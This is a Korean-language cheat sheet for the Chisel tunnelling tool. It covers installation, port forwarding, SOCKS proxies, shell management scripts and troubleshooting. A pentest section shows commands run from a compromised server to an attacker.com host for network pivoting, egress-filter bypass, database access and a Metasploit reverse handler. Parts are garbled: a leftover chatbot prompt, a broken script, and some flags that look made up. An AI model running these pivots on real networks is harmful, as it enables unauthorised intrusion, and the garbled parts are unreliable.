Chisel 치트 시트
## 개요
Chisel은 HTTP를 통해 전송되고 SSH로 보안되는 빠른 TCP/UDP 터널입니다. 네트워크 피벗, 포트 포워딩, 방화벽 우회를 위한 강력한 도구입니다. Go로 작성된 Chisel은 가볍고, 크로스 플랫폼이며, 배포하기 쉽게 설계되었습니다. 제한적인 네트워크 환경에서 안전한 터널을 설정해야 하는 침투 테스트 시나리오에서 특히 유용합니다.
⚠️ 경고: Chisel은 자신이 소유하거나 명시적인 허가를 받은 환경에서만 사용하세요. 무단 사용은 서비스 약관이나 현지 법률을 위반할 수 있습니다.
설치
사전 컴파일된 바이너리
# Download latest release for Linux
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_1.9.1_linux_amd64.gz
gunzip chisel_1.9.1_linux_amd64.gz
chmod +x chisel_1.9.1_linux_amd64
sudo mv chisel_1.9.1_linux_amd64 /usr/local/bin/chisel
# Download for Windows
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_1.9.1_windows_amd64.gz
# Download for macOS
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_1.9.1_darwin_amd64.gz
# Verify installation
chisel --version패키지 관리자 설치
# Ubuntu/Debian (from snap)
sudo snap install chisel
# macOS with Homebrew
brew install chisel
# Arch Linux (AUR)
yay -S chisel
# Go installation
go install github.com/jpillora/chisel@latest수동 컴파일
# Install Go if not already installed
wget https://golang.org/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
# Clone and build Chisel
git clone https://github.com/jpillora/chisel.git
cd chisel
go build -ldflags "-s -w" .
# Install binary
sudo mv chisel /usr/local/bin/Docker 설치
# Pull Docker image
docker pull jpillora/chisel:latest
# Run Chisel server in Docker
docker run --rm -p 8080:8080 jpillora/chisel:latest server --port 8080
# Create alias for easier usage
echo 'alias chisel="docker run --rm -it --network host jpillora/chisel:latest"' >> ~/.bashrc
source ~/.bashrc기본 사용법
서버 모드
# Start basic server
chisel server --port 8080
# Server with authentication
chisel server --port 8080 --auth user:password
# Server with key-based authentication
chisel server --port 8080 --key "your-secret-key"
# Server with reverse tunnels allowed
chisel server --port 8080 --reverse
# Server with specific bind address
chisel server --host 0.0.0.0 --port 8080
# Server with verbose logging
chisel server --port 8080 -v클라이언트 모드
# Basic client connection
chisel client server.example.com:8080
# Client with authentication
chisel client user:password@server.example.com:8080
# Client with key-based authentication
chisel client --auth user:password server.example.com:8080
# Client with verbose logging
chisel client -v server.example.com:8080
# Client with custom fingerprint verification
chisel client --fingerprint "ab:cd:ef:..." server.example.com:8080포트 포워딩
로컬 포트 포워딩
# Forward local port 3000 to remote port 80
chisel client server.example.com:8080 3000:target.internal:80
# Forward local port 8080 to remote SSH
chisel client server.example.com:8080 2222:target.internal:22
# Forward local port to remote database
chisel client server.example.com:8080 5432:database.internal:5432
# Multiple port forwards
chisel client server.example.com:8080 3000:web.internal:80 2222:ssh.internal:22
# Forward with specific local interface
chisel client server.example.com:8080 127.0.0.1:3000:target.internal:80원격 포트 포워딩
# Server must be started with --reverse flag
chisel server --port 8080 --reverse
# Forward remote port 8080 to local port 80
chisel client server.example.com:8080 R:8080:localhost:80
# Forward remote port to local SSH
chisel client server.example.com:8080 R:2222:localhost:22
# Forward remote port to local database
chisel client server.example.com:8080 R:5432:localhost:5432
# Multiple remote forwards
chisel client server.example.com:8080 R:8080:localhost:80 R:2222:localhost:22동적 포트 포워딩 (SOCKS)
# Create SOCKS5 proxy on local port 1080
chisel client server.example.com:8080 socks
# Create SOCKS5 proxy on custom port
chisel client server.example.com:8080 1080:socks
# Create SOCKS5 proxy with specific interface
chisel client server.example.com:8080 127.0.0.1:1080:socks
# Use the SOCKS proxy
curl --socks5 127.0.0.1:1080 http://internal.target.com고급 터널링
HTTP 터널링
# Server configuration for HTTP tunneling
chisel server --port 80 --reverse
# Client connecting through HTTP
chisel client http://server.example.com:80 3000:target.internal:80
# Client with custom headers
chisel client --header "X-Custom: value" server.example.com:8080 3000:target.internal:80
# Client through HTTP proxy
chisel client --proxy http://proxy.company.com:8080 server.example.com:8080 3000:target.internal:80HTTPS 터널링
# Server with TLS
chisel server --port 443 --tls-key server.key --tls-cert server.crt
# Client connecting via HTTPS
chisel client https://server.example.com:443 3000:target.internal:80
# Client ignoring certificate errors
chisel client --tls-skip-verify https://server.example.com:443 3000:target.internal:80
# Client with custom CA certificate
chisel client --tls-ca ca.crt https://server.example.com:443 3000:target.internal:80WebSocket 터널링
# Server with WebSocket support (default)
chisel server --port 8080
# Client using WebSocket
chisel client ws://server.example.com:8080 3000:target.internal:80
# Client using secure WebSocket
chisel client wss://server.example.com:8080 3000:target.internal:80
# Client with custom WebSocket path
chisel client server.example.com:8080/custom/path 3000:target.internal:80침투 테스트 시나리오
네트워크 피벗
# Scenario: Access internal network through compromised web server
# 1. On compromised web server (DMZ host)
./chisel client attacker.com:8080 R:9999:127.0.0.1:9999
# 2. On attacker machine
chisel server --port 8080 --reverse
# 3. Create SOCKS proxy through the tunnel
chisel client 127.0.0.1:9999 1080:socks
# 4. Use SOCKS proxy to access internal network
proxychains4 nmap -sT 192.168.1.0/24
curl --socks5 127.0.0.1:1080 http://192.168.1.100방화벽 우회
# Scenario: Bypass egress filtering
# 1. Set up Chisel server on external VPS (port 443 for HTTPS)
chisel server --port 443 --tls-cert server.crt --tls-key server.key --reverse
# 2. From internal network, connect to external server
chisel client https://external.vps.com:443 R:8080:127.0.0.1:8080
# 3. Create local SOCKS proxy
chisel client 127.0.0.1:8080 1080:socks
# 4. Route traffic through the tunnel
export https_proxy=socks5://127.0.0.1:1080
curl https://blocked-site.com데이터베이스 접근
# Scenario: Access internal database through web application server
# 1. On web application server
chisel client attacker.com:8080 R:5432:database.internal:5432
# 2. On attacker machine
chisel server --port 8080 --reverse
# 3. Connect to database through tunnel
psql -h 127.0.0.1 -p 5432 -U dbuser -d production
# 4. Or create persistent tunnel
chisel client 127.0.0.1:8080 5432:database.internal:5432다중 홉 터널링
# Scenario: Chain multiple tunnels for deep network access
# 1. First hop: Attacker -> DMZ Server
chisel server --port 8080 --reverse # On attacker machine
chisel client attacker.com:8080 R:9001:127.0.0.1:9001 # On DMZ server
# 2. Second hop: DMZ Server -> Internal Server
chisel server --port 9001 --reverse # On DMZ server
chisel client 127.0.0.1:9001 R:9002:127.0.0.1:9002 # On internal server
# 3. Final access: Create SOCKS proxy
chisel client 127.0.0.1:9002 1080:socks # On attacker machine
# 4. Access deep internal resources
curl --socks5 127.0.0.1:1080 http://deep.internal.network자동화 스크립트
터널 관리 스크립트
#!/bin/bash
# Chisel tunnel management script
CHISEL_SERVER="server.example.com:8080"
CHISEL_AUTH="user:password"
PID_DIR="/tmp/chisel_pids"
LOG_DIR="/tmp/chisel_logs"
mkdir -p "$PID_DIR" "$LOG_DIR"
start_tunnel() \\\\{
local name="$1"
local tunnel_spec="$2"
local pid_file="$PID_DIR/$\\\\{name\\\\}.pid"
local log_file="$LOG_DIR/$\\\\{name\\\\}.log"
if [ -f "$pid_file" ] && kill -0 "$(cat "$pid_file")" 2>/dev/null; then
echo "Tunnel '$name' is already running (PID: $(cat "$pid_file"))"
return 1
fi
echo "Starting tunnel: $name"
chisel client --auth "$CHISEL_AUTH" "$CHISEL_SERVER" "$tunnel_spec" \
> "$log_file" 2>&1 &
echo $! > "$pid_file"
echo "Tunnel '$name' started (PID: $!)"
\\\\}
stop_tunnel() \\\\{
local name="$1"
local pid_file="$PID_DIR/$\\\\{name\\\\}.pid"
if [ ! -f "$pid_file" ]; then
echo "Tunnel '$name' is not running"
return 1
fi
local pid=$(cat "$pid_file")
if kill -0 "$pid" 2>/dev/null; then
kill "$pid"
rm "$pid_file"
echo "Tunnel '$name' stopped"
else
echo "Tunnel '$name' was not running (removing stale PID file)"
rm "$pid_file"
fi
\\\\}
status_tunnel() \\\\{
local name="$1"
local pid_file="$PID_DIR/$\\\\{name\\\\}.pid"
if [ -f "$pid_file" ] && kill -0 "$(cat "$pid_file")" 2>/dev/null; then
echo "Tunnel '$name' is running (PID: $(cat "$pid_file"))"
else
echo "Tunnel '$name' is not running"
fi
\\\\}
list_tunnels() \\\\{
echo "Active tunnels:"
for pid_file in "$PID_DIR"/*.pid; do
if [ -f "$pid_file" ]; then
local name=$(basename "$pid_file" .pid)
status_tunnel "$name"
fi
done
\\\\}
case "$1" in
start)
if [ $# -ne 3 ]; then
echo "Usage: $0 start <name> <tunnel_spec>"
echo "Example: $0 start web 3000:internal.web:80"
exit 1
fi
start_tunnel "$2" "$3"
;;
stop)
if [ $# -ne 2 ]; then
echo "Usage: $0 stop <name>"
exit 1
fi
stop_tunnel "$2"
;;
status)
if [ $# -ne 2 ]; then
echo "Usage: $0 status <name>"
exit 1
fi
status_tunnel "$2"
;;
list)
list_tunnels
;;
*)
echo "Usage: $0 \\\\{start|stop|status|list\\\\}"
echo ""
echo "Commands:"
echo " start <name> <spec> Start a named tunnel"
echo " stop <name> Stop a named tunnel"
echo " status <name> Check tunnel status"
echo " list List all tunnels"
exit 1
;;
esac자동 재연결 스크립트
#!/bin/bash
# Auto-reconnecting Chisel client
CHISEL_SERVER="server.example.com:8080"
CHISEL_AUTH="user:password"
TUNNEL_SPEC="3000:internal.web:80"
RECONNECT_DELAY=10
MAX_RETRIES=0 # 0 = infinite retries
retry_count=0
while true; do
echo "[$(date)] Starting Chisel client..."
chisel client --auth "$CHISEL_AUTH" "$CHISEL_SERVER" "$TUNNEL_SPEC"
exit_code=$?
echo "[$(date)] Chisel client exited with code: $exit_code"
if [ $MAX_RETRIES -gt 0 ] && [ $retry_count -ge $MAX_RETRIES ]; then
echo "[$(date)] Maximum retries ($MAX_RETRIES) reached. Exiting."
exit 1
fi
retry_count=$((retry_count + 1))
echo "[$(date)] Retry $retry_count. Reconnecting in $RECONNECT_DELAY seconds..."
sleep $RECONNECT_DELAY
done상태 확인 스크립트
Would you like me to continue with the remaining sections?```bash #!/bin/bash
Chisel tunnel health check
TUNNEL_NAME=“$1” TEST_HOST=“$2” TEST_PORT=“$3” SOCKS_PORT=”$\\{4:-1080\\}”
if [ $# -lt 3 ]; then echo “Usage: $0 <tunnel_name> <test_host> <test_port> [socks_port]” echo “Example: $0 web internal.web 80 1080” exit 1 fi
check_tunnel_process() \\{ pgrep -f “chisel.*$TUNNEL_NAME” >/dev/null \\}
check_socks_proxy() \\{ nc -z 127.0.0.1 “$SOCKS_PORT” 2>/dev/null \\}
check_target_connectivity() \\{
timeout 10 curl -s —socks5 “127.0.0.1:$SOCKS_PORT”
“http://$TEST_HOST:$TEST_PORT” >/dev/null 2>&1
\\}
echo “Checking tunnel health: $TUNNEL_NAME”
Check if tunnel process is running
if check_tunnel_process; then echo ”✓ Tunnel process is running” else echo ”✗ Tunnel process is not running” exit 1 fi
Check if SOCKS proxy is listening
if check_socks_proxy; then echo ”✓ SOCKS proxy is listening on port $SOCKS_PORT” else echo ”✗ SOCKS proxy is not listening on port $SOCKS_PORT” exit 1 fi
Check target connectivity
if check_target_connectivity; then echo ”✓ Target $TEST_HOST:$TEST_PORT is reachable through tunnel” else echo ”✗ Target $TEST_HOST:$TEST_PORT is not reachable through tunnel” exit 1 fi
echo “All health checks passed!”
```bash
#!/bin/bash
# Set up multiple tunnels from configuration file
CONFIG_FILE="$\\\\{1:-tunnels.conf\\\\}"
if [ ! -f "$CONFIG_FILE" ]; then
echo "Configuration file not found: $CONFIG_FILE"
echo "Creating example configuration..."
cat > "$CONFIG_FILE" << 'EOF'
# Chisel tunnel configuration
# Format: name|server|auth|tunnel_spec
web|server.example.com:8080|user:pass|3000:internal.web:80
ssh|server.example.com:8080|user:pass|2222:internal.ssh:22
db|server.example.com:8080|user:pass|5432:internal.db:5432
socks|server.example.com:8080|user:pass|1080:socks
EOF
echo "Example configuration created: $CONFIG_FILE"
echo "Edit the file and run the script again."
exit 1
fi
echo "Setting up tunnels from: $CONFIG_FILE"
while IFS='|' read -r name server auth tunnel_spec; do
# Skip comments and empty lines
[[ "$name" =~ ^#.*$ ]] && continue
[[ -z "$name" ]] && continue
echo "Starting tunnel: $name"
chisel client --auth "$auth" "$server" "$tunnel_spec" \
> "/tmp/chisel_$\\\\{name\\\\}.log" 2>&1 &
echo $! > "/tmp/chisel_$\\\\{name\\\\}.pid"
echo " PID: $!"
echo " Log: /tmp/chisel_$\\\\{name\\\\}.log"
sleep 2
done ``< "$CONFIG_FILE"
echo "All tunnels started. Use 'ps aux|grep chisel' to verify."
```## 보안 도구와의 통합
### Metasploit 통합
```bash
# Set up reverse tunnel for Metasploit payload
# 1. On target machine
chisel client attacker.com:8080 R:4444:127.0.0.1:4444
# 2. On attacker machine
chisel server --port 8080 --reverse
# 3. In Metasploit
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
run
```### SSH 터널링
```bash
# Replace SSH tunneling with Chisel
# Traditional SSH tunnel:
# ssh -L 3000:internal.web:80 user@jumphost
# Equivalent Chisel tunnel:
chisel server --port 8080 --reverse # On jumphost
chisel client jumphost:8080 3000:internal.web:80 # On local machine
# Dynamic SSH tunnel replacement:
# ssh -D 1080 user@jumphost
# Equivalent Chisel SOCKS proxy:
chisel client jumphost:8080 1080:socks
```### Burp Suite 통합
```bash
# Set up Chisel SOCKS proxy for Burp Suite
chisel client server.example.com:8080 1080:socks
# Configure Burp Suite to use SOCKS proxy:
# 1. Go to User options >`` Connections > SOCKS Proxy
# 2. Check "Use SOCKS proxy"
# 3. SOCKS host: 127.0.0.1
# 4. SOCKS port: 1080
# Or use Burp's upstream proxy settings:
# 1. Go to User options > Connections > Upstream Proxy Servers
# 2. Add rule for target host
# 3. Proxy host: 127.0.0.1
# 4. Proxy port: 1080
# 5. Proxy type: SOCKS
```## 문제 해결
### 일반적인 문제
#### 연결 문제
```bash
# Test server connectivity
nc -zv server.example.com 8080
# Check if server is running
chisel server --port 8080 -v
# Test with verbose client
chisel client -v server.example.com:8080
# Check firewall rules
sudo ufw status
sudo iptables -L인증 문제
# Test authentication
chisel client --auth user:password server.example.com:8080
# Check server authentication settings
chisel server --port 8080 --auth user:password -v
# Use key-based authentication
chisel server --port 8080 --key "secret-key"
chisel client --auth user:secret-key server.example.com:8080터널 문제
# Test local port binding
netstat -tlnp|grep :3000
# Test target connectivity from server
nc -zv target.internal 80
# Check tunnel specification syntax
chisel client server.example.com:8080 3000:target.internal:80 -v
# Test SOCKS proxy
curl --socks5 127.0.0.1:1080 http://httpbin.org/ip성능 문제
# Monitor tunnel performance
iftop -i any
nethogs
# Check system resources
top
htop
# Optimize tunnel settings
chisel client --keepalive 30s server.example.com:8080 3000:target.internal:80
# Use compression (if available)
chisel client --compress server.example.com:8080 3000:target.internal:80디버깅 및 로깅
# Enable verbose logging
chisel server --port 8080 -v
chisel client -v server.example.com:8080 3000:target.internal:80
# Log to file
chisel server --port 8080 -v 2>&1|tee server.log
chisel client -v server.example.com:8080 3000:target.internal:80 2>&1|tee client.log
# Monitor network traffic
sudo tcpdump -i any -n host server.example.com
sudo tcpdump -i any -n port 8080
# Check system logs
journalctl -f|grep chisel
tail -f /var/log/syslog|grep chisel리소스
이 치트 시트는 TCP/UDP 터널링 및 네트워크 피벗을 위한 Chisel 사용에 대한 포괄적인 참조를 제공합니다. 항상 이 도구를 모든 환경에서 사용하기 전에 적절한 권한이 있는지 확인하세요.